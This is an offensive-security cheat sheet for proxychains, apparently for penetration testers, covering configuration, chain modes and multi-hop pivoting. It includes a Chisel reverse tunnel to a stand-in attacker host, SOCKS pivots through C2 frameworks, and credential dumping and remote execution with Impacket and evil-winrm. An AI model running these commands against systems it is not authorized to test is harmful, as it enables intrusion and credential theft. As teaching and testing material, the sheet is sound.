โ† All cheat sheets

PROXYCHAINS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Route any TCP connection through proxy chains (SOCKS4, SOCKS5, HTTP).
Essential for pivoting, anonymity, and routing tools through tunnels.

INSTALLATION#

# Debian/Kali
sudo apt install proxychains4

# From source (proxychains-ng)
git clone https://github.com/rofl0r/proxychains-ng
cd proxychains-ng && ./configure && make && sudo make install

CONFIGURATION#

# Config file locations (checked in order):
# 1. ./proxychains.conf (current directory)
# 2. ~/.proxychains/proxychains.conf
# 3. /etc/proxychains4.conf (or /etc/proxychains.conf)

# Edit config
sudo nano /etc/proxychains4.conf

PROXY MODES#

# dynamic_chain โ€” skip dead proxies, continue through chain
dynamic_chain

# strict_chain โ€” all proxies must be alive, fail if one is down
strict_chain

# round_robin_chain โ€” rotate through proxies
round_robin_chain

# random_chain โ€” random proxy order each connection
random_chain
chain_len = 2                               # Number of proxies to use

PROXY LIST FORMAT#

# At bottom of proxychains.conf:
[ProxyList]
# type    host        port    [user]  [pass]
socks5    127.0.0.1   1080
socks4    127.0.0.1   9050
http      10.10.10.1  8080    user    pass
socks5    127.0.0.1   1081    user    pass

# Multiple proxies = chained through in order (strict/dynamic)

COMMON PROXY SETUPS#

# Through SSH SOCKS proxy
ssh -D 1080 user@pivot_host
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Chisel
# Attacker: chisel server --reverse --port 8080
# Pivot:    chisel client ATTACKER:8080 R:socks
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Ligolo-ng
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Cobalt Strike SOCKS
# beacon> socks 1080
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Sliver SOCKS
# sliver> socks5 start -P 1080
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Metasploit
# meterpreter> run autoroute -s 10.10.10.0/24
# msf> use auxiliary/server/socks_proxy
# msf> set SRVPORT 1080
# msf> run
# proxychains.conf:
# socks5 127.0.0.1 1080

# Through Tor
# proxychains.conf:
# socks5 127.0.0.1 9050

BASIC USAGE#

# Prefix any command with proxychains
proxychains nmap -sT -Pn 10.10.10.5
proxychains curl http://10.10.10.5
proxychains firefox
proxychains ssh user@10.10.10.5

# Quiet mode (suppress proxy output)
proxychains -q nmap -sT -Pn 10.10.10.5

# Specify config file
proxychains -f /path/to/custom.conf nmap -sT -Pn 10.10.10.5

COMMON TOOL USAGE#

# Nmap (TCP connect scan only, no SYN/UDP)
proxychains nmap -sT -Pn -n 10.10.10.5
proxychains nmap -sT -Pn -n -p 80,443,445 10.10.10.5
# -sT required (proxychains can't handle raw sockets)
# -Pn required (ICMP doesn't go through proxychains)
# -n recommended (avoid DNS leaks)

# CrackMapExec / NetExec
proxychains nxc smb 10.10.10.0/24
proxychains nxc smb 10.10.10.5 -u user -p pass --shares

# Evil-WinRM
proxychains evil-winrm -i 10.10.10.5 -u admin -p pass

# Impacket
proxychains psexec.py DOMAIN/user:pass@10.10.10.5
proxychains secretsdump.py DOMAIN/user:pass@10.10.10.5
proxychains wmiexec.py DOMAIN/user:pass@10.10.10.5

# SMBClient
proxychains smbclient //10.10.10.5/share -U user

# RDP
proxychains xfreerdp /u:user /p:pass /v:10.10.10.5

# Web tools
proxychains gobuster dir -u http://10.10.10.5 -w wordlist.txt
proxychains ffuf -u http://10.10.10.5/FUZZ -w wordlist.txt
proxychains nikto -h http://10.10.10.5
proxychains whatweb http://10.10.10.5
proxychains curl -v http://10.10.10.5

# BloodHound
proxychains bloodhound-python -u user -p pass -d domain.local -c All -ns DC_IP

# SSH
proxychains ssh user@10.10.10.5

DNS CONFIGURATION#

# DNS leak prevention
# In proxychains.conf:
proxy_dns                                   # Proxy DNS through chain

# DNS timeout
remote_dns_subnet 224                       # Fake DNS subnet
tcp_read_time_out 15000                     # TCP read timeout (ms)
tcp_connect_time_out 8000                   # TCP connect timeout (ms)

# If DNS resolution fails, try:
# 1. Use IP addresses instead of hostnames
# 2. Add target to /etc/hosts
# 3. Use -n flag with nmap

MULTI-HOP PIVOTING#

# Chain through multiple compromised hosts

# Setup:
# Host A (attacker) โ†’ Host B (pivot 1) โ†’ Host C (pivot 2) โ†’ Target

# SSH multi-hop
ssh -D 1080 user@hostB
# On Host B: ssh -D 1081 user@hostC

# proxychains.conf (strict_chain):
# socks5 127.0.0.1 1080
# Then tools reach through both hops

# Or use SSH ProxyJump
ssh -J user@hostB user@hostC

TROUBLESHOOTING#

# "Connection refused" or timeouts
  - Verify proxy is running: ss -tlnp | grep 1080
  - Check proxy type (socks4 vs socks5 vs http)
  - Ensure target port is reachable from pivot

# Tools not working through proxychains
  - Tool must use TCP (not UDP/ICMP/raw sockets)
  - nmap: must use -sT (TCP connect), not -sS (SYN)
  - ping won't work (ICMP)
  - Some tools use static linked libs (bypass LD_PRELOAD)

# Slow performance
  - Use dynamic_chain to skip dead proxies
  - Reduce thread count on scanning tools
  - Consider direct port forwarding for specific services

# DNS leaks
  - Enable proxy_dns in config
  - Use IP addresses instead of hostnames
  - Verify with tcpdump: tcpdump -i any port 53

PROXYCHAINS VS ALTERNATIVES#

Tool            Method              Best For
----            ------              --------
proxychains     LD_PRELOAD hook     CLI tools, easy setup
tsocks          LD_PRELOAD hook     Simpler alternative
noproxy         Direct tunnel       Specific services
ssh -L          Port forward        Single port access
ssh -D          SOCKS proxy         Browser/proxychains
chisel          SOCKS/portfwd       Reverse tunnels
ligolo-ng       TUN interface       Full network access

TIPS#

  - Always use -sT -Pn with nmap through proxychains
  - dynamic_chain is most reliable for unstable proxies
  - Use -q flag to reduce noise in output
  - Some Go-based tools don't work (static linking bypasses LD_PRELOAD)
  - For Go tools, use Ligolo-ng TUN interface instead
  - Reduce scan speed through proxies (avoid overwhelming tunnel)
  - Test proxy connectivity: proxychains curl http://ifconfig.me
  - Keep proxy config simple; complex chains add latency
  - For OSCP: SSH SOCKS + proxychains is the standard approach